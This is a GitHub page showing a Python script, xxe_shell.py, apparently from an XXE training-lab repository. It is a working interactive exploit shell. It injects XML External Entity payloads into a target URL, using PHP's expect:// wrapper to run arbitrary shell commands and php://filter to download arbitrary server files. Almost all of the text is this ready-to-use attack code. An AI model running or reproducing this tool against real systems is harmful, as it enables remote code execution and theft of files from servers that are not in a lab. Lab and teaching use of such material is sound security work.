forked from jbarone/xxelab
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathxxe_shell.py
executable file
·63 lines (49 loc) · 2.13 KB
/
xxe_shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/python
import argparse
import base64
import cmd
import requests
import re
class XXECommandLine(cmd.Cmd):
"""Accepts commands and executes them against a given URL"""
prompt = 'xxe sh$ '
xml = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE root ' \
'[<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/' \
'resource=expect://CMD" >]><root><name></name><tel>' \
'</tel><email>OUT&xxe;OUT</email><password></password></root>'
fxml = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE root ' \
'[<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/' \
'resource=CMD" >]><root><name></name><tel>' \
'</tel><email>OUT&xxe;OUT</email><password></password></root>'
def __init__(self, url):
cmd.Cmd.__init__(self)
self.url = url
def do_quit(self, arg):
return True
def do_getfile(self, arg):
i = arg.rfind('/') + 1
fname = arg[i:]
req = requests.post(self.url, data=self.fxml.replace('CMD', arg))
with open(fname, 'wb') as fh:
fh.write(base64.b64decode(
re.findall(ur'OUT([a-zA-Z0-9].+?)OUT', req.content)[0]))
def do_cmd(self, cmd):
req = requests.post(self.url, data=self.xml.replace('CMD', cmd))
print base64.b64decode(
re.findall(ur'OUT([a-zA-Z0-9].+?)OUT', req.content)[0])
def banner():
print '____ _______ ______________ _________.__ .__ .__ '
print '\ \/ /\ \/ /\_ _____/ / _____/| |__ ____ | | | | '
print ' \ / \ / | __)_ \_____ \ | | \_/ __ \| | | | '
print ' / \ / \ | \ / \| Y \ ___/| |_| |__'
print '/___/\ \/___/\ \/_______ / /_______ /|___| /\___ >____/____/'
print ' \_/ \_/ \/ \/ \/ \/ '
print ' @tygarsai '
print ''
if __name__ == '__main__':
banner()
parser = argparse.ArgumentParser()
parser.add_argument('url')
results = parser.parse_args()
url = results.url
XXECommandLine(url).cmdloop()